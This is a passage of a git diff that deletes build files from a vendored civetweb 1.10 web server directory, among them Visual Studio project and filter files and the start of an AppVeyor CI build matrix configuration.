-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\loadlib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lobject.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lopcodes.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\loslib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lparser.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lstate.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lstring.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lstrlib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ltable.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ltablib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\ltm.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lundump.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lvm.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\lua-5.2.4\src\lzio.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\third_party\LuaXML_lib.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\src\third_party\sqlite3.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\src\third_party\lfs.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-</Project>

diff --git a/thirdparty/civetweb-1.10/VisualStudio/unit_test/unit_test.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/unit_test/unit_test.vcxproj
deleted file mode 100644
index d3e02cd..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/unit_test/unit_test.vcxproj
+++ /dev/null
@@ -1,105 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h" />

-    <ClInclude Include="..\..\test\civetweb_check.h" />

-    <ClInclude Include="..\..\test\private.h" />

-    <ClInclude Include="..\..\test\private_exe.h" />

-    <ClInclude Include="..\..\test\public_func.h" />

-    <ClInclude Include="..\..\test\public_server.h" />

-    <ClInclude Include="..\..\test\timertest.h" />

-    <ClInclude Include="..\..\test\shared.h" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\civetweb.c" />

-    <ClCompile Include="..\..\test\private.c" />

-    <ClCompile Include="..\..\test\private_exe.c" />

-    <ClCompile Include="..\..\test\public_func.c" />

-    <ClCompile Include="..\..\test\public_server.c" />

-    <ClInclude Include="..\..\test\timertest.c" />

-    <ClCompile Include="..\..\test\shared.c" />

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{1AC4A7A6-0100-4287-97F4-B95807BE5607}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>unit_test</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-    <PlatformToolset>v140_xp</PlatformToolset>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>REPLACE_CHECK_FOR_LOCAL_DEBUGGING;LOCAL_TEST;USE_IPV6;USE_WEBSOCKET;MEMORY_DEBUGGING;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src;$(ProjectDir)..\..\include;$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;$(ProjectDir)..\..\..\check-0.10.0\;$(ProjectDir)..\..\..\check-0.10.0\src\;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>REPLACE_CHECK_FOR_LOCAL_DEBUGGING;WIN32;NDEBUG;_CONSOLE;_CRT_SECURE_NO_DEPRECATE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\src;$(ProjectDir)..\..\include;$(ProjectDir)..\..\src\third_party\lua-5.2.4\src;$(ProjectDir)..\..\..\check-0.10.0\;$(ProjectDir)..\..\..\check-0.10.0\src\;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/unit_test/unit_test.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/unit_test/unit_test.vcxproj.filters
deleted file mode 100644
index bf33419..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/unit_test/unit_test.vcxproj.filters
+++ /dev/null
@@ -1,66 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Quelldateien">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Headerdateien">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Ressourcendateien">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\public_server.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\public_func.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\private_exe.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\private.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\timertest.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\shared.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\civetweb_check.h">

-      <Filter>Headerdateien</Filter>

-    </ClInclude>

-    <ClInclude Include="..\..\test\timertest.c">

-      <Filter>Quelldateien</Filter>

-    </ClInclude>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\test\public_server.c">

-      <Filter>Quelldateien</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\test\public_func.c">

-      <Filter>Quelldateien</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\test\private.c">

-      <Filter>Quelldateien</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\test\private_exe.c">

-      <Filter>Quelldateien</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\test\shared.c">

-      <Filter>Quelldateien</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\src\civetweb.c">

-      <Filter>Quelldateien</Filter>

-    </ClCompile>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/upload/upload.vcxproj b/thirdparty/civetweb-1.10/VisualStudio/upload/upload.vcxproj
deleted file mode 100644
index 4aec14c..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/upload/upload.vcxproj
+++ /dev/null
@@ -1,160 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project DefaultTargets="Build" ToolsVersion="14.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup Label="ProjectConfigurations">

-    <ProjectConfiguration Include="Debug|Win32">

-      <Configuration>Debug</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Debug|x64">

-      <Configuration>Debug</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|Win32">

-      <Configuration>Release</Configuration>

-      <Platform>Win32</Platform>

-    </ProjectConfiguration>

-    <ProjectConfiguration Include="Release|x64">

-      <Configuration>Release</Configuration>

-      <Platform>x64</Platform>

-    </ProjectConfiguration>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\examples\upload\upload.c" />

-    <ClCompile Include="..\..\src\civetweb.c" />

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h" />

-  </ItemGroup>

-  <PropertyGroup Label="Globals">

-    <ProjectGuid>{882EC43C-2EEE-434B-A711-C845678D29C6}</ProjectGuid>

-    <Keyword>Win32Proj</Keyword>

-    <RootNamespace>upload</RootNamespace>

-    <WindowsTargetPlatformVersion>8.1</WindowsTargetPlatformVersion>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>true</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">

-    <ConfigurationType>Application</ConfigurationType>

-    <UseDebugLibraries>false</UseDebugLibraries>

-    <PlatformToolset>v140</PlatformToolset>

-    <WholeProgramOptimization>true</WholeProgramOptimization>

-    <CharacterSet>MultiByte</CharacterSet>

-  </PropertyGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />

-  <ImportGroup Label="ExtensionSettings">

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">

-    <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />

-  </ImportGroup>

-  <PropertyGroup Label="UserMacros" />

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <LinkIncremental>true</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <LinkIncremental>false</LinkIncremental>

-    <OutDir>$(SolutionDir)\$(Configuration)\$(Platform)\</OutDir>

-  </PropertyGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>NO_FILES;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">

-    <ClCompile>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <WarningLevel>Level3</WarningLevel>

-      <Optimization>Disabled</Optimization>

-      <PreprocessorDefinitions>NO_FILES;WIN32;_DEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>NO_FILES;WIN32;NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">

-    <ClCompile>

-      <WarningLevel>Level3</WarningLevel>

-      <PrecompiledHeader>

-      </PrecompiledHeader>

-      <Optimization>MaxSpeed</Optimization>

-      <FunctionLevelLinking>true</FunctionLevelLinking>

-      <IntrinsicFunctions>true</IntrinsicFunctions>

-      <PreprocessorDefinitions>NO_FILES;WIN32;NDEBUG;_CONSOLE;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>

-      <AdditionalIncludeDirectories>$(ProjectDir)..\..\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>

-    </ClCompile>

-    <Link>

-      <SubSystem>Console</SubSystem>

-      <GenerateDebugInformation>true</GenerateDebugInformation>

-      <EnableCOMDATFolding>true</EnableCOMDATFolding>

-      <OptimizeReferences>true</OptimizeReferences>

-    </Link>

-  </ItemDefinitionGroup>

-  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />

-  <ImportGroup Label="ExtensionTargets">

-  </ImportGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/VisualStudio/upload/upload.vcxproj.filters b/thirdparty/civetweb-1.10/VisualStudio/upload/upload.vcxproj.filters
deleted file mode 100644
index fb2d247..0000000
--- a/thirdparty/civetweb-1.10/VisualStudio/upload/upload.vcxproj.filters
+++ /dev/null
@@ -1,30 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>

-<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">

-  <ItemGroup>

-    <Filter Include="Source Files">

-      <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A322342A2FF}</UniqueIdentifier>

-      <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>

-    </Filter>

-    <Filter Include="Header Files">

-      <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52E765}</UniqueIdentifier>

-      <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>

-    </Filter>

-    <Filter Include="Resource Files">

-      <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AA145}</UniqueIdentifier>

-      <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>

-    </Filter>

-  </ItemGroup>

-  <ItemGroup>

-    <ClCompile Include="..\..\src\civetweb.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-    <ClCompile Include="..\..\examples\upload\upload.c">

-      <Filter>Source Files</Filter>

-    </ClCompile>

-  </ItemGroup>

-  <ItemGroup>

-    <ClInclude Include="..\..\include\civetweb.h">

-      <Filter>Header Files</Filter>

-    </ClInclude>

-  </ItemGroup>

-</Project>
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/_config.yml b/thirdparty/civetweb-1.10/_config.yml
deleted file mode 100644
index 259a24e..0000000
--- a/thirdparty/civetweb-1.10/_config.yml
+++ /dev/null
@@ -1 +0,0 @@
-theme: jekyll-theme-tactile
\ No newline at end of file
diff --git a/thirdparty/civetweb-1.10/appveyor.yml b/thirdparty/civetweb-1.10/appveyor.yml
deleted file mode 100644
index 87455a2..0000000
--- a/thirdparty/civetweb-1.10/appveyor.yml
+++ /dev/null
@@ -1,386 +0,0 @@
-version: '{build}'

-

-

-build:

-# no automatic build in script mode

-

-

-skip_commits:

-  # Builds just testing something on Travis CI don't need to be 

-  # done on AppVeyor

-  message: /\[Travis\]/

-  # Dont build, if only documentation was changed

-  files:

-  - '**/*.md'

-

-

-environment:

-  enable_cxx: NO

-  enable_ssl_dynamic_loading: YES

-  enable_lua: NO

-  enable_lua_shared: NO

-  c_standard: auto

-  cxx_standard: auto

-  matrix:

-    # Use default values

-    - id: Default-x86

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: NO

-      enable_ssl: YES

-      enable_websockets: NO

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x86

-    - id: Default-x64

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: NO

-      enable_ssl: YES

-      enable_websockets: NO

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x64

-    # Use default values

-    - id: Full-x86

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x86

-    - id: Full-x64

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x64

-    # Debug builds

-    - id: Full-x86-Debug

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Debug

-      platform: x86

-    - id: Full-x64-Debug

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Debug

-      platform: x64

-    # Minimum settings

-    - id: Minimal-x86

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: YES

-      enable_ipv6: NO

-      enable_ssl: NO

-      enable_websockets: NO

-      no_cgi: YES

-      no_caching: YeS

-      configuration: Release

-      platform: x86

-    - id: Minimal-x64

-      compiler: msvc-19-seh

-      build_shared: NO

-      no_files: YES

-      enable_ipv6: NO

-      enable_ssl: NO

-      enable_websockets: NO

-      no_cgi: YES

-      no_caching: YeS

-      configuration: Release

-      platform: x64

-    # Test shared and debug build

-    - id: Shared-default-x86

-      compiler: msvc-19-seh

-      build_shared: YES

-      no_files: NO

-      enable_ipv6: NO

-      enable_ssl: YES

-      enable_websockets: NO

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x86

-    - id: Shared-default-x64

-      compiler: msvc-19-seh

-      build_shared: YES

-      no_files: NO

-      enable_ipv6: NO

-      enable_ssl: YES

-      enable_websockets: NO

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x64

-    # MinGW

-    - id: Full-GCC-x64

-      compiler: gcc-5.1.0-posix

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x64

-    # Visual Studio 2010

-    - id: Full-VS2010-x86

-      compiler: msvc-16-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x86

-    # Visual Studio 2012

-    - id: Full-VS2012-x86

-      compiler: msvc-17-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x86

-    # Visual Studio 2013

-    - id: Full-VS2013-x86

-      compiler: msvc-18-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x86

-    - id: Full-VS2013-x64

-      compiler: msvc-18-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x64

-    # Visual Studio 2015 is default

-    # Visual Studio 2017 is not yet default

-    - id: Full-VS2017-x86

-      compiler: msvc-20-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x86

-      APPVEYOR_BUILD_WORKER_IMAGE: Visual Studio 2017

-    - id: Full-VS2017-x64

-      compiler: msvc-20-seh

-      build_shared: NO

-      no_files: NO

-      enable_ipv6: YES

-      enable_ssl: YES

-      enable_websockets: YES

-      no_cgi: NO

-      no_caching: NO

-      configuration: Release

-      platform: x64

-      APPVEYOR_BUILD_WORKER_IMAGE: Visual Studio 2017

-

-

-install:

-  # Derive some extra information

-  - set build_type=%configuration%

-  - for /f "tokens=1-3 delims=-" %%a in ("%compiler%") do (@set "compiler_name=%%a")

-  - for /f "tokens=1-3 delims=-" %%a in ("%compiler%") do (@set "compiler_version=%%b")

-  - for /f "tokens=1-3 delims=-" %%a in ("%compiler%") do (@set "compiler_threading=%%c")

-  - if "%platform%"=="x64" (set arch=x86_64)

-  - if "%platform%"=="x86" (set arch=i686)

-  # Download the specific version of MinGW

-  - if "%compiler_name%"=="gcc" (@set "mingw_output_folder=C:\mingw-builds")

-  - if "%compiler_name%"=="gcc" (

-      @for /f %%a in (

-        'call mingw.cmd

-          /version "%compiler_version%"

-          /arch "%arch%"

-          /threading "%compiler_threading%"

-          "%mingw_output_folder%"'

-      ) do @set "compiler_path=%%a"

-    )

-  - if "%compiler_name%"=="gcc" (@set "mingw_log_folder=%mingw_output_folder%\logs")

-  - if exist "%mingw_log_folder%" @for /f %%f in ('dir /b /oD /tc "%mingw_log_folder%"') do @set "mingw_log_file=%mingw_log_folder%\%%f"

-  - if exist "%mingw_log_file%" powershell Push-AppveyorArtifact "%mingw_log_file%" -FileName mingw-download.log

-  # Get OpenSSL

-  #

-  # OpenSSL should already be installed, according to

-  # - http://help.appveyor.com/discussions/questions/1132-openssl-installation-issues

-  # - https://github.com/appveyor/ci/issues/576

-  #

-  - cmd: set PATH=%PATH%;C:\OpenSSL-Win32;C:\OpenSSL-Win64

-  - dir C:\OpenSSL-Win32

-  - dir C:\OpenSSL-Win64

-  - path

-

-

-before_build:

-  # Remove sh.exe from the path otherwise CMake will complain:

-  # "sh.exe was found in your PATH, here: C:/Program Files/Git/usr/bin/sh.exe"

-  # and the MinGW build will not work (the Visual Studio build does not care).

